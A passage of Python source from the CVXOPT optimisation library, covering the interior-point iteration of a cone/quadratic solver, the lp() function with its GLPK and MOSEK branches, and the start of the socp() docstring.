if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
else:
if 'x' in initvals:
xcopy(initvals['x'], x)
else:
xscal(0.0, x)
if 's' in initvals:
blas.copy(initvals['s'], s)
# ts = min{ t | s + t*e >= 0 }
if misc.max_step(s, dims) >= 0:
raise ValueError("initial s is not positive")
else:
s[: dims['l']] = 1.0
ind = dims['l']
for m in dims['q']:
s[ind] = 1.0
ind += m
for m in dims['s']:
s[ind : ind + m*m : m+1] = 1.0
ind += m**2
if 'y' in initvals:
ycopy(initvals['y'], y)
else:
yscal(0.0, y)
if 'z' in initvals:
blas.copy(initvals['z'], z)
# tz = min{ t | z + t*e >= 0 }
if misc.max_step(z, dims) >= 0:
raise ValueError("initial z is not positive")
else:
z[: dims['l']] = 1.0
ind = dims['l']
for m in dims['q']:
z[ind] = 1.0
ind += m
for m in dims['s']:
z[ind : ind + m*m : m+1] = 1.0
ind += m**2
rx, ry, rz = xnewcopy(q), ynewcopy(b), matrix(0.0, (cdim, 1))
dx, dy = xnewcopy(x), ynewcopy(y)
dz, ds = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
lmbda = matrix(0.0, (dims['l'] + sum(dims['q']) + sum(dims['s']), 1))
lmbdasq = matrix(0.0, (dims['l'] + sum(dims['q']) + sum(dims['s']), 1))
sigs = matrix(0.0, (sum(dims['s']), 1))
sigz = matrix(0.0, (sum(dims['s']), 1))
if show_progress:
print("% 10s% 12s% 10s% 8s% 7s" %("pcost", "dcost", "gap", "pres",
"dres"))
gap = misc.sdot(s, z, dims)
for iters in range(MAXITERS + 1):
# f0 = (1/2)*x'*P*x + q'*x + r and rx = P*x + q + A'*y + G'*z.
xcopy(q, rx)
fP(x, rx, beta = 1.0)
f0 = 0.5 * (xdot(x, rx) + xdot(x, q))
fA(y, rx, beta = 1.0, trans = 'T')
fG(z, rx, beta = 1.0, trans = 'T')
resx = math.sqrt(xdot(rx, rx))
# ry = A*x - b
ycopy(b, ry)
fA(x, ry, alpha = 1.0, beta = -1.0)
resy = math.sqrt(ydot(ry, ry))
# rz = s + G*x - h
blas.copy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
fG(x, rz, beta = 1.0)
resz = misc.snrm2(rz, dims)
# Statistics for stopping criteria.
# pcost = (1/2)*x'*P*x + q'*x
# dcost = (1/2)*x'*P*x + q'*x + y'*(A*x-b) + z'*(G*x-h)
# = (1/2)*x'*P*x + q'*x + y'*(A*x-b) + z'*(G*x-h+s) - z'*s
# = (1/2)*x'*P*x + q'*x + y'*ry + z'*rz - gap
pcost = f0
dcost = f0 + ydot(y, ry) + misc.sdot(z, rz, dims) - gap
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
if show_progress:
print("%2d: % 8.4e % 8.4e % 4.0e% 7.0e% 7.0e" \
%(iters, pcost, dcost, gap, pres, dres))
if ( pres <= FEASTOL and dres <= FEASTOL and ( gap <= ABSTOL or
(relgap is not None and relgap <= RELTOL) )) or \
iters == MAXITERS:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if iters == MAXITERS:
if show_progress:
print("Terminated (maximum number of iterations "\
"reached).")
status = 'unknown'
else:
if show_progress:
print("Optimal solution found.")
status = 'optimal'
return { 'x': x, 'y': y, 's': s, 'z': z, 'status': status,
'gap': gap, 'relative gap': relgap,
'primal objective': pcost, 'dual objective': dcost,
'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz , 'iterations': iters }
# Compute initial scaling W and scaled iterates:
#
# W * z = W^{-T} * s = lambda.
#
# lmbdasq = lambda o lambda.
if iters == 0: W = misc.compute_scaling(s, z, lmbda, dims)
misc.ssqr(lmbdasq, lmbda, dims)
# f3(x, y, z) solves
#
# [ P A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ bz ]
#
# On entry, x, y, z contain bx, by, bz.
# On exit, they contain ux, uy, uz.
try: f3 = kktsolver(W)
except ArithmeticError:
if iters == 0:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
else:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown', 'gap': gap,
'relative gap': relgap, 'primal objective': pcost,
'dual objective': dcost, 'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz, 'iterations': iters }
# f4_no_ir(x, y, z, s) solves
#
# [ 0 ] [ P A' G' ] [ ux ] [ bx ]
# [ 0 ] + [ A 0 0 ] * [ uy ] = [ by ]
# [ W'*us ] [ G 0 0 ] [ W^{-1}*uz ] [ bz ]
#
# lmbda o (uz + us) = bs.
#
# On entry, x, y, z, s contain bx, by, bz, bs.
# On exit, they contain ux, uy, uz, us.
def f4_no_ir(x, y, z, s):
    # Single (unrefined) solve of the extended KKT system.
    # Eliminate us from the last equation, then solve
    #
    #     [ P A' G'   ] [ ux        ]   [ bx                    ]
    #     [ A 0  0    ] [ uy        ] = [ by                    ]
    #     [ G 0 -W'*W ] [ W^{-1}*uz ]   [ bz - W'*(lmbda o\ bs) ]
    #
    # and recover us = lmbda o\ bs - uz.
    #
    # On entry, x, y, z, s contain bx, by, bz, bs.
    # On exit they contain ux, uy, uz, us.

    # s := lmbda o\ s
    #    = lmbda o\ bs
    misc.sinv(s, lmbda, dims)

    # z := z - W'*s
    #    = bz - W'*(lambda o\ bs)
    blas.copy(s, ws3)
    misc.scale(ws3, W, trans = 'T')
    blas.axpy(ws3, z, alpha = -1.0)

    # Solve for ux, uy, uz (f3 overwrites x, y, z in place).
    f3(x, y, z)

    # s := s - z
    #    = lambda o\ bs - uz.
    blas.axpy(z, s, alpha = -1.0)
# f4(x, y, z, s) solves the same system as f4_no_ir, but applies
# iterative refinement.
if iters == 0:
if refinement or DEBUG:
wx, wy = xnewcopy(q), ynewcopy(b)
wz, ws = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
if refinement:
wx2, wy2 = xnewcopy(q), ynewcopy(b)
wz2, ws2 = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
def f4(x, y, z, s):
    # Same system as f4_no_ir, with 'refinement' rounds of iterative
    # refinement: save the righthand side (wx, wy, wz, ws), solve,
    # then repeatedly evaluate the residual with res(), solve for a
    # correction and add it to the iterate.  With DEBUG set, the
    # final KKT residual norms are printed.
    if refinement or DEBUG:
        xcopy(x, wx)
        ycopy(y, wy)
        blas.copy(z, wz)
        blas.copy(s, ws)
    f4_no_ir(x, y, z, s)
    for i in range(refinement):
        # Residual of the current solution w.r.t. the saved RHS.
        xcopy(wx, wx2)
        ycopy(wy, wy2)
        blas.copy(wz, wz2)
        blas.copy(ws, ws2)
        res(x, y, z, s, wx2, wy2, wz2, ws2, W, lmbda)
        # Solve for the correction and apply it.
        f4_no_ir(wx2, wy2, wz2, ws2)
        xaxpy(wx2, x)
        yaxpy(wy2, y)
        blas.axpy(wz2, z)
        blas.axpy(ws2, s)
    if DEBUG:
        res(x, y, z, s, wx, wy, wz, ws, W, lmbda)
        print("KKT residuals:")
        print("    'x': %e" %math.sqrt(xdot(wx, wx)))
        print("    'y': %e" %math.sqrt(ydot(wy, wy)))
        print("    'z': %e" %misc.snrm2(wz, dims))
        print("    's': %e" %misc.snrm2(ws, dims))
mu = gap / (dims['l'] + len(dims['q']) + sum(dims['s']))
sigma, eta = 0.0, 0.0
for i in [0, 1]:
# Solve
#
# [ 0 ] [ P A' G' ] [ dx ]
# [ 0 ] + [ A 0 0 ] * [ dy ] = -(1 - eta) * r
# [ W'*ds ] [ G 0 0 ] [ W^{-1}*dz ]
#
# lmbda o (dz + ds) = -lmbda o lmbda + sigma*mu*e (i=0)
# lmbda o (dz + ds) = -lmbda o lmbda - dsa o dza
# + sigma*mu*e (i=1) where dsa, dza
# are the solution for i=0.
# ds = -lmbdasq + sigma * mu * e (if i is 0)
# = -lmbdasq - dsa o dza + sigma * mu * e (if i is 1),
# where ds, dz are solution for i is 0.
blas.scal(0.0, ds)
if correction and i == 1:
blas.axpy(ws3, ds, alpha = -1.0)
blas.axpy(lmbdasq, ds, n = dims['l'] + sum(dims['q']),
alpha = -1.0)
ds[:dims['l']] += sigma*mu
ind = dims['l']
for m in dims['q']:
ds[ind] += sigma*mu
ind += m
ind2 = ind
for m in dims['s']:
blas.axpy(lmbdasq, ds, n = m, offsetx = ind2, offsety =
ind, incy = m + 1, alpha = -1.0)
ds[ind : ind + m*m : m+1] += sigma*mu
ind += m*m
ind2 += m
# (dx, dy, dz) := -(1 - eta) * (rx, ry, rz)
xscal(0.0, dx); xaxpy(rx, dx, alpha = -1.0 + eta)
yscal(0.0, dy); yaxpy(ry, dy, alpha = -1.0 + eta)
blas.scal(0.0, dz)
blas.axpy(rz, dz, alpha = -1.0 + eta)
try: f4(dx, dy, dz, ds)
except ArithmeticError:
if iters == 0:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
else:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown', 'gap': gap,
'relative gap': relgap, 'primal objective': pcost,
'dual objective': dcost,
'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz, 'iterations': iters }
dsdz = misc.sdot(ds, dz, dims)
# Save ds o dz for Mehrotra correction
if correction and i == 0:
blas.copy(ds, ws3)
misc.sprod(ws3, dz, dims)
# Maximum steps to boundary.
#
# If i is 1, also compute eigenvalue decomposition of the
# 's' blocks in ds,dz. The eigenvectors Qs, Qz are stored in
# dsk, dzk. The eigenvalues are stored in sigs, sigz.
misc.scale2(lmbda, ds, dims)
misc.scale2(lmbda, dz, dims)
if i == 0:
ts = misc.max_step(ds, dims)
tz = misc.max_step(dz, dims)
else:
ts = misc.max_step(ds, dims, sigma = sigs)
tz = misc.max_step(dz, dims, sigma = sigz)
t = max([ 0.0, ts, tz ])
if t == 0:
step = 1.0
else:
if i == 0:
step = min(1.0, 1.0 / t)
else:
step = min(1.0, STEP / t)
if i == 0:
sigma = min(1.0, max(0.0,
1.0 - step + dsdz/gap * step**2))**EXPON
eta = 0.0
xaxpy(dx, x, alpha = step)
yaxpy(dy, y, alpha = step)
# We will now replace the 'l' and 'q' blocks of ds and dz with
# the updated iterates in the current scaling.
# We also replace the 's' blocks of ds and dz with the factors
# Ls, Lz in a factorization Ls*Ls', Lz*Lz' of the updated variables
# in the current scaling.
# ds := e + step*ds for nonlinear, 'l' and 'q' blocks.
# dz := e + step*dz for nonlinear, 'l' and 'q' blocks.
blas.scal(step, ds, n = dims['l'] + sum(dims['q']))
blas.scal(step, dz, n = dims['l'] + sum(dims['q']))
ind = dims['l']
ds[:ind] += 1.0
dz[:ind] += 1.0
for m in dims['q']:
ds[ind] += 1.0
dz[ind] += 1.0
ind += m
# ds := H(lambda)^{-1/2} * ds and dz := H(lambda)^{-1/2} * dz.
#
# This replaced the 'l' and 'q' components of ds and dz with the
# updated iterates in the current scaling.
# The 's' components of ds and dz are replaced with
#
# diag(lmbda_k)^{1/2} * Qs * diag(lmbda_k)^{1/2}
# diag(lmbda_k)^{1/2} * Qz * diag(lmbda_k)^{1/2}
#
misc.scale2(lmbda, ds, dims, inverse = 'I')
misc.scale2(lmbda, dz, dims, inverse = 'I')
# sigs := ( e + step*sigs ) ./ lambda for 's' blocks.
# sigz := ( e + step*sigz ) ./ lambda for 's' blocks.
blas.scal(step, sigs)
blas.scal(step, sigz)
sigs += 1.0
sigz += 1.0
blas.tbsv(lmbda, sigs, n = sum(dims['s']), k = 0, ldA = 1, offsetA
= dims['l'] + sum(dims['q']))
blas.tbsv(lmbda, sigz, n = sum(dims['s']), k = 0, ldA = 1, offsetA
= dims['l'] + sum(dims['q']))
# dsk := Ls = dsk * sqrt(sigs).
# dzk := Lz = dzk * sqrt(sigz).
ind2, ind3 = dims['l'] + sum(dims['q']), 0
for k in range(len(dims['s'])):
m = dims['s'][k]
for i in range(m):
blas.scal(math.sqrt(sigs[ind3+i]), ds, offset = ind2 + m*i,
n = m)
blas.scal(math.sqrt(sigz[ind3+i]), dz, offset = ind2 + m*i,
n = m)
ind2 += m*m
ind3 += m
# Update lambda and scaling.
misc.update_scaling(W, lmbda, ds, dz)
# Unscale s, z (unscaled variables are used only to compute
# feasibility residuals).
blas.copy(lmbda, s, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, s, offset = ind2)
blas.copy(lmbda, s, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(s, W, trans = 'T')
blas.copy(lmbda, z, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, z, offset = ind2)
blas.copy(lmbda, z, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(z, W, inverse = 'I')
gap = blas.dot(lmbda, lmbda)
def lp(c, G, h, A = None, b = None, kktsolver = None, solver = None, primalstart = None,
dualstart = None, **kwargs):
"""
Solves a pair of primal and dual LPs
minimize c'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -h'*z - b'*y
subject to G'*z + A'*y + c = 0
z >= 0.
Input arguments.
c is n x 1, G is m x n, h is m x 1, A is p x n, b is p x 1. G and
A must be dense or sparse 'd' matrices. c, h and b are dense 'd'
matrices with one column. The default values for A and b are
empty matrices with zero rows.
solver is None, 'glpk' or 'mosek'. The default solver (None)
uses the cvxopt conelp() function. The 'glpk' solver is the
simplex LP solver from GLPK. The 'mosek' solver is the LP solver
from MOSEK.
The arguments primalstart and dualstart are ignored when solver
is 'glpk' or 'mosek', and are optional when solver is None.
The argument primalstart is a dictionary with keys 'x' and 's',
and specifies a primal starting point. primalstart['x'] must
be a dense 'd' matrix of length n; primalstart['s'] must be a
positive dense 'd' matrix of length m.
The argument dualstart is a dictionary with keys 'z' and 'y',
and specifies a dual starting point. dualstart['y'] must
be a dense 'd' matrix of length p; dualstart['z'] must be a
positive dense 'd' matrix of length m.
When solver is None, we require n >= 1, Rank(A) = p and
Rank([G; A]) = n
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'residual as primal infeasibility certificate',
'residual as dual infeasibility certificate'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The values of the other fields
depend on the exit status and the solver used.
Status 'optimal'.
- 'x', 's', 'y', 'z' are an approximate solution of the primal and
dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0.
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s - h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack min_k s_k.
- 'dual slack': the smallest dual slack min_k z_k.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the primal infeasibility is
guaranteed to be less than solvers.options['feastol']
(default 1e-7). The dual infeasibility is guaranteed to be less
than solvers.options['feastol'] (default 1e-7). The gap is less
than solvers.options['abstol'] (default 1e-7) or the relative gap
is less than solvers.options['reltol'] (default 1e-6).
For the other solvers, the default GLPK or MOSEK exit criteria
apply.
Status 'primal infeasible'. If the GLPK solver is used, all the
fields except the status field are None. For the default and
the MOSEK solvers, the values are as follows.
- 'x', 's': None.
- 'y', 'z' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack min z_k.
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the residual as primal infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). For the other
solvers, the default GLPK or MOSEK exit criteria apply.
Status 'dual infeasible'. If the GLPK solver is used, all the
fields except the status field are empty. For the default and the
MOSEK solvers, the values are as follows.
- 'x', 's' are an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'z': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack min_k s_k .
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
If the default solver is used, the residual as dual infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). For the other
solvers, the default GLPK or MOSEK exit criteria apply.
Status 'unknown'. If the GLPK or MOSEK solver is used, all the
fields except the status field are None. If the default solver
is used, the values are as follows.
- 'x', 'y', 's', 'z' are the last iterates before termination.
These satisfy s > 0 and z > 0, but are not necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s - h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack min_k s_k.
- 'dual slack': the smallest dual slack min_k z_k.
- 'residual as primal infeasibility certificate':
None if h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / (-c'*x * max(1, ||h||))
and
|| A*x || / (-c'*x * max(1, ||b||))
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Control parameters.
The control parameters for the different solvers can be modified
by adding an entry to the dictionary cvxopt.solvers.options. The
following parameters control the execution of the default solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 0)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The control parameter names for GLPK are strings with the name of
the GLPK parameter, listed in the GLPK documentation. The MOSEK
parameters can be modified by adding an entry options['mosek'],
containing a dictionary with MOSEK parameter/value pairs, as
described in the MOSEK documentation.
Options that are not recognized are replaced by their default
values.
"""
options = kwargs.get('options',globals()['options'])
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
if not isinstance(c, matrix) or c.typecode != 'd' or c.size[1] != 1:
raise TypeError("'c' must be a dense column matrix")
n = c.size[0]
if n < 1: raise ValueError("number of variables must be at least 1")
if not isinstance(G, (matrix,spmatrix)) or G.typecode != 'd' or G.size[1] != n:
raise TypeError("'G' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
m = G.size[0]
if not isinstance(h, matrix) or h.typecode != 'd' or h.size != (m,1):
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %m)
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if not isinstance(A,(matrix,spmatrix)) or A.typecode != 'd' or A.size[1] != n:
raise TypeError("'A' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
p = A.size[0]
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size != (p,1):
raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)
if solver == 'glpk':
try: from cvxopt import glpk
except ImportError: raise ValueError("invalid option "\
"(solver = 'glpk'): cvxopt.glpk is not installed")
opts = options.get('glpk',None)
if opts:
status, x, z, y = glpk.lp(c, G, h, A, b, options = opts)
else:
status, x, z, y = glpk.lp(c, G, h, A, b)
if status == 'optimal':
resx0 = max(1.0, blas.nrm2(c))
resy0 = max(1.0, blas.nrm2(b))
resz0 = max(1.0, blas.nrm2(h))
pcost = blas.dot(c,x)
dcost = -blas.dot(h,z) - blas.dot(b,y)
s = matrix(h)
base.gemv(G, x, s, alpha=-1.0, beta=1.0)
gap = blas.dot(s, z)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z + A'*y
rx = matrix(c)
base.gemv(G, z, rx, beta = 1.0, trans = 'T')
base.gemv(A, y, rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# ry = b - A*x
ry = matrix(b)
base.gemv(A, x, ry, alpha = -1.0, beta = 1.0)
resy = blas.nrm2(ry) / resy0
# rz = G*x + s - h
rz = matrix(0.0, (m,1))
base.gemv(G, x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = blas.nrm2(rz) / resz0
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = max(resy, resz), resx
pinfres, dinfres = None, None
else:
s = None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pslack, dslack = None, None
pinfres, dinfres = None, None
return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
'primal objective': pcost, 'dual objective': dcost,
'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'primal slack': pslack, 'dual slack': dslack,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres}
if solver == 'mosek':
try:
from cvxopt import msk
import mosek
except ImportError:
raise ValueError("invalid option (solver = 'mosek'): "\
"cvxopt.msk is not installed")
opts = options.get('mosek',None)
if opts:
solsta, x, z, y = msk.lp(c, G, h, A, b, options=opts)
else:
solsta, x, z, y = msk.lp(c, G, h, A, b)
resx0 = max(1.0, blas.nrm2(c))
resy0 = max(1.0, blas.nrm2(b))
resz0 = max(1.0, blas.nrm2(h))
if solsta in (mosek.solsta.optimal, getattr(mosek.solsta,'near_optimal',None)):
if solsta is mosek.solsta.optimal: status = 'optimal'
else: status = 'near optimal'
pcost = blas.dot(c,x)
dcost = -blas.dot(h,z) - blas.dot(b,y)
# s = h - G*x
s = matrix(h)
base.gemv(G, x, s, alpha = -1.0, beta = 1.0)
gap = blas.dot(s, z)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z + A'*y
rx = matrix(c)
base.gemv(G, z, rx, beta = 1.0, trans = 'T')
base.gemv(A, y, rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# ry = b - A*x
ry = matrix(b)
base.gemv(A, x, ry, alpha = -1.0, beta = 1.0)
resy = blas.nrm2(ry) / resy0
# rz = G*x + s - h
rz = matrix(0.0, (m,1))
base.gemv(G, x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = blas.nrm2(rz) / resz0
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = max(resy, resz), resx
pinfres, dinfres = None, None
elif solsta is mosek.solsta.prim_infeas_cer:
status = 'primal infeasible'
hz, by = blas.dot(h, z), blas.dot(b, y)
blas.scal(1.0 / (-hz - by), y)
blas.scal(1.0 / (-hz - by), z)
# rx = -A'*y - G'*z
rx = matrix(0.0, (n,1))
base.gemv(A, y, rx, alpha = -1.0, trans = 'T')
base.gemv(G, z, rx, alpha = -1.0, beta = 1.0, trans = 'T')
pinfres = blas.nrm2(rx) / resx0
dinfres = None
x, s = None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
dslack = -misc.max_step(z, dims)
pslack = None
elif solsta == mosek.solsta.dual_infeas_cer:
status = 'dual infeasible'
cx = blas.dot(c,x)
blas.scal(-1.0/cx, x)
s = matrix(0.0, (m,1))
base.gemv(G, x, s, alpha = -1.0)
# ry = A*x
ry = matrix(0.0, (p,1))
base.gemv(A, x, ry)
resy = blas.nrm2(ry) / resy0
# rz = s + G*x
rz = matrix(s)
base.gemv(G, x, rz, beta = 1.0)
resz = blas.nrm2(rz) / resz0
pres, dres = None, None
dinfres, pinfres = max(resy, resz), None
z, y = None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = None
else:
status = 'unknown'
s = None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pinfres, dinfres = None, None
pslack, dslack = None, None
return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
'primal objective': pcost, 'dual objective': dcost,
'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres,
'primal slack': pslack, 'dual slack': dslack}
return conelp(c, G, h, {'l': m, 'q': [], 's': []}, A, b, primalstart,
dualstart, kktsolver = kktsolver, options = options)
def socp(c, Gl = None, hl = None, Gq = None, hq = None, A = None, b = None,
    kktsolver = None, solver = None, primalstart = None, dualstart = None, **kwargs):
    """
    Solves a pair of primal and dual SOCPs

        minimize    c'*x
        subject to  Gl*x + sl = hl
                    Gq[k]*x + sq[k] = hq[k],  k = 0, ..., N-1
                    A*x = b
                    sl >= 0,
                    sq[k] >= 0, k = 0, ..., N-1

        maximize    -hl'*zl - sum_k hq[k]'*zq[k] - b'*y
        subject to  Gl'*zl + sum_k Gq[k]'*zq[k] + A'*y + c = 0
                    zl >= 0,  zq[k] >= 0, k = 0, ..., N-1.

    The inequalities sl >= 0 and zl >= 0 are elementwise vector
    inequalities.  The inequalities sq[k] >= 0, zq[k] >= 0 are second
    order cone inequalities, i.e., equivalent to

        sq[k][0] >= || sq[k][1:] ||_2,  zq[k][0] >= || zq[k][1:] ||_2.

    Input arguments.

        Gl is a dense or sparse 'd' matrix of size (ml, n).  hl is a
        dense 'd' matrix of size (ml, 1).  The default values of Gl and
        hl are matrices with zero rows.

        The argument Gq is a list of N dense or sparse 'd' matrices of
        size (m[k], n), k = 0, ..., N-1, where m[k] >= 1.  hq is a list
        of N dense 'd' matrices of size (m[k], 1), k = 0, ..., N-1.
        The default values of Gq and hq are empty lists.

        A is a dense or sparse 'd' matrix of size (p,n).  b is a dense
        'd' matrix of size (p,1).  The default values of A and b are
        matrices with zero rows.

        solver is None or 'mosek'.  The default solver (None) uses the
        cvxopt conelp() function.  The 'mosek' solver is the SOCP
        solver from MOSEK.

        The arguments primalstart and dualstart are ignored when solver
        is 'mosek', and are optional when solver is None.

        The argument primalstart is a dictionary with keys 'x', 'sl',
        'sq', and specifies an optional primal starting point.
        primalstart['x'] is a dense 'd' matrix of size (n,1).
        primalstart['sl'] is a positive dense 'd' matrix of size (ml,1).
        primalstart['sq'] is a list of matrices of size (m[k],1),
        positive with respect to the second order cone of order m[k].

        The argument dualstart is a dictionary with keys 'y', 'zl',
        'zq', and specifies an optional dual starting point.
        dualstart['y'] is a dense 'd' matrix of size (p,1).
        dualstart['zl'] is a positive dense 'd' matrix of size (ml,1).
        dualstart['zq'] is a list of matrices of size (m[k],1), positive
        with respect to the second order cone of order m[k].

    Output arguments.

        Returns a dictionary with keys 'status', 'x', 'sl', 'sq', 'zl',
        'zq', 'y', 'primal objective', 'dual objective', 'gap',
        'relative gap', 'primal infeasibility', 'dual infeasibility',
        'primal slack', 'dual slack', 'residual as primal infeasibility
        certificate', 'residual as dual infeasibility certificate'.

        The 'status' field has values 'optimal', 'primal infeasible',
        'dual infeasible', or 'unknown'.  The values of the other
        fields depend on the exit status and the solver used.

        Status 'optimal'.
        - 'x', 'sl', 'sq', 'y', 'zl', 'zq' are an approximate solution
          of the primal and dual optimality conditions

